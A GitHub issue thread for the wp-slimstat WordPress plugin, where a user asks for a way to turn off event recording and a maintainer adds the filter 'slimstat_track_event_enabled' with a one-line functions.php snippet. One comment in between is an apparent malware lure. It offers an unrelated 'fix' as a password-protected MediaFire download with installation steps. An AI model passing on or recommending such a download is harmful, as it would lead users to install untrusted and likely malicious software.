### ISSUE TITLE
Feature idea- turn off recording of events

### ISSUE THREAD

**Issue by mikeweinberg** [slimstat/wp-slimstat#54]
In wp-slimstat.php, there is [code](https://github.com/wp-slimstat/wp-slimstat/blob/e7039e108430c7058008101c1d9e2b51e7abde77/wp-slimstat.php#L218C1-L219C1) to insert events in the slim_events table. This data isn't useful to me and causes an unnecessary database insert. So I'd recommend a preference to turn it off. 

This is the line I will be commenting out: `self::_insert_row($event_info, $GLOBALS['wpdb']->prefix . 'slim_events');
`

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by mostafasoufi** [comment]
It's not recommended to disable the insert event globally for all users. However, I've added a new filter, `slimstat_track_event_enabled`, in the development version. This filter will be available in the next release and allows you to globally disable the event by adding this code to your theme's `functions.php`:

```php
add_filter('slimstat_track_event_enabled', '__return_false');
```
